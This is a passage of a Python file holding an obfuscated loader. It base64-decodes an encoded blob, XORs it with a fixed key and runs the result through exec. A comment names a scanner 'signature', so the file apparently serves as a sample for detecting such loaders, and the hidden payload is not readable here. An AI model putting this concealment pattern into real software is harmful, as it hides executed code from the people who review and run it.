G1DGIDhdYTbuxVslHWSdm6/Jm40dZJzK5q3zJFRx2Z/z4KJpJCWhh7aMZpyMpSFvX33DJDQpofKTUP4YLFWJx7aN1xUcNbn/85CmdWkwuGLmrfMkCAWR36f98rB8aYmLt4jOHXXMnMrmrfMlHWXdz6vhW"
_K = bytes.fromhex("0712998b5ce96779")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    raw = base64.b64decode(_BLOB)
    return _xor(raw, _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
